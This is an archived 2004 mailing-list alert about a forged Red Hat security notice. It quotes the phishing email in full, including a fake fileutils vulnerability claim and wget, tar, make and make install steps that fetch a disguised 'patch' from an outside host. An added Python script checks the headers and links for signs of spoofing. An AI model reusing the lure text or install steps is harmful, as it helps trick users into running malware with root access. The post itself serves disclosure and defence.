[CS-FSLUG] Alert to Trojan Aimed at Red Hat Users
Timothy R. Butler
tbutler at uninetsolutions.com
Sat Nov 20 14:32:55 CST 2004
Dear Sir:
I wanted to alert you to this forged Red Hat security notice that I
received two copies of this morning (see below). I see that it has been
sent out previously to others, but the download location of the file
has changed. I have contacted the company hosting the file, but I would
imagine if Red Hat contacts them they may be more likely to remove it
at an expedited rate.
Best Regards,
Timothy R. Butler
---------------------------------------------------------------
Timothy R. Butler Universal Networks www.uninet.info
==================== <tbutler at uninet.info> ====================
| Christian Portal: | Have you not learned great lessons |
| www.faithtree.com | from those who braced themselves |
| GNU/Linux News: | against you and disputed the |
| www.ofb.biz | passage with you? --Walt Whitman |
---------------------------------------------------------------
Presently on "Albert" (DP PPC 970 "G5" running at 2.0 GHz)
Begin forwarded message:
> From: Red Hat<update at redhat.com>
> Date: November 20, 2004 2:59:43 AM CST
> To: undisclosed-recipients:;
> Subject: Fileutils Buffer Overflow
> Return-Path: <mailman-bounces at cedar.serverforest.com>
> Envelope-To: tbutler at ofb.biz
> Delivery-Date: Sat, 20 Nov 2004 04:07:46 -0500
> Received: from ofb by cedar.serverforest.com with local-bsmtp (Exim
> 4.43) id 1CVRDd-00070v-O9 for tbutler at ofb.biz; Sat, 20 Nov 2004
> 04:07:46 -0500
> Received: from localhost ([127.0.0.1] helo=cedar.serverforest.com) by
> cedar.serverforest.com with esmtp (Exim 4.43) id 1CVRDb-00070a-Eg for
> tbutler at uninetsolutions.com; Sat, 20 Nov 2004 04:07:43 -0500
> Received: from [81.196.160.41] (helo=campus.emsolgroup.com) by
> cedar.serverforest.com with esmtps (TLSv1:AES256-SHA:256) (Exim 4.43)
> id 1CVRDV-000709-Ns for ofbtalk-owner at ofb.biz; Sat, 20 Nov 2004
> 04:07:39 -0500
> Received: from campus.emsolgroup.com (localhost.rdsct.ro [127.0.0.1])
> by campus.emsolgroup.com (8.13.1/8.12.6) with ESMTP id iAK8xhjo008889
> for <ofbtalk-owner at ofb.biz>; Sat, 20 Nov 2004 10:59:43 +0200 (EET)
> (envelope-from nobody at ems.rdsct.ro)
> Received: (from nobody at localhost) by campus.emsolgroup.com
> (8.13.1/8.12.6/Submit) id iAK8xh6M008887 for ofbtalk-owner at ofb.biz;
> Sat, 20 Nov 2004 10:59:43 +0200 (EET)
> Message-Id: <200411200859.iAK8xh6M008887 at campus.emsolgroup.com>
> Mime-Version: 1.0
> Content-Type: text/html; boundary="xlcuiBo847gtaDvjhSdgF983r"
> X-Mailer: ebay
> Errors-To: mailman-bounces at cedar.serverforest.com
> X-Spam-Status: No, score=-0.7 required=5.0 tests=BAYES_00,HTML_30_40,
> HTML_IMAGE_ONLY_20,HTML_MESSAGE,MIME_HTML_ONLY,UNDISC_RECIPS
> autolearn=no version=3.0.1
> X-Spam-Checker-Version: SpamAssassin 3.0.1 (2004-10-22) on
> cedar.serverforest.com
> X-Spam-Level:
>
>
> Original issue date: October 20, 2004
> Last revised: October 20, 2004
> Source: Red Hat
>
> A complete revision history is at the end of this file.
>
> Dear Red Hat user,
>
> We have found a vulnerability in fileutils (ls and mkdir), that could
> allow a remote attacker to execute arbitrary code with root
> privileges. Some of the affected linux distributions include RedHat
> 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2
> and not only. It is known that *BSD and Solaris platforms are NOT
> affected.
>
> The Red Hat Security Team strongly advises you to immediately apply
> the fileutils-1.0.6 patch. This is a critical-critical update that you
> must make by following these steps:
> - First download the patch from the Wcml Red Hat mirror: wget
> http://www.wcml.co.uk/critical/fileutils-1.0.6.patch.tar.gz or
> directly here.
> - Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
> - cd fileutils-1.0.6.patch
> - make
> - make install
>
> Again, please apply this patch as soon as possible or you risk your
> system and others` to be compromised.
>
> Thank you for your prompt attention to this serious matter,
>
> Red Hat Security Team.
>
> Copyright © 2004 Red Hat, Inc. All rights reserved.
>
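
The headers quoted in the forwarded message already disagree with the sender it claims. The following Python is an added example, not part of the original post: it applies three heuristics (relay hosts, Message-Id host, link hosts) to a constructed subset of those headers and body. The names `SAMPLE`, `under` and `audit` are assumptions of this example, and legitimate mail sent through third-party relays can trip the first two checks.

```python
import re
from email import message_from_string
from email.utils import parseaddr
from urllib.parse import urlparse

# Constructed sample: a subset of the headers and body quoted above, with the
# archive's " at " address obfuscation undone where a parser needs "@".
SAMPLE = """\
From: Red Hat <update@redhat.com>
Subject: Fileutils Buffer Overflow
Received: from [81.196.160.41] (helo=campus.emsolgroup.com) by
 cedar.serverforest.com with esmtps (Exim 4.43) id 1CVRDV-000709-Ns
Received: from campus.emsolgroup.com (localhost.rdsct.ro [127.0.0.1])
 by campus.emsolgroup.com (8.13.1/8.12.6) with ESMTP id iAK8xhjo008889
Received: (from nobody at localhost) by campus.emsolgroup.com
 (8.13.1/8.12.6/Submit) id iAK8xh6M008887
Message-Id: <200411200859.iAK8xh6M008887@campus.emsolgroup.com>

First download the patch from the Wcml Red Hat mirror: wget
http://www.wcml.co.uk/critical/fileutils-1.0.6.patch.tar.gz
"""

def under(host, domain):
    """True if host is the domain itself or a subdomain of it."""
    host = host.lower().rstrip(".")
    return host == domain or host.endswith("." + domain)

def audit(raw):
    """Return reasons the message does not match its claimed sender (heuristic)."""
    msg = message_from_string(raw)
    claimed = parseaddr(msg["From"])[1].rpartition("@")[2].lower()
    findings = []
    # Hosts that accepted the message, from the "by <host>" part of each Received.
    hops = [m.group(1) for h in msg.get_all("Received", [])
            if (m := re.search(r"\bby\s+([\w.-]+)", h))]
    if hops and not any(under(h, claimed) for h in hops):
        findings.append(f"no Received hop under {claimed}; first hop was {hops[-1]}")
    mid_host = (msg["Message-Id"] or "").strip("<> ").rpartition("@")[2]
    if mid_host and not under(mid_host, claimed):
        findings.append(f"Message-Id minted by {mid_host}")
    for url in re.findall(r"https?://[^\s>\"']+", msg.get_payload()):
        host = urlparse(url).hostname or ""
        if not under(host, claimed):
            findings.append(f"link points off-domain: {host}")
    return findings

if __name__ == "__main__":
    for line in audit(SAMPLE):
        print("-", line)
```

Received headers are read bottom-up, so the last entry in `hops` is the host where the message entered the mail system.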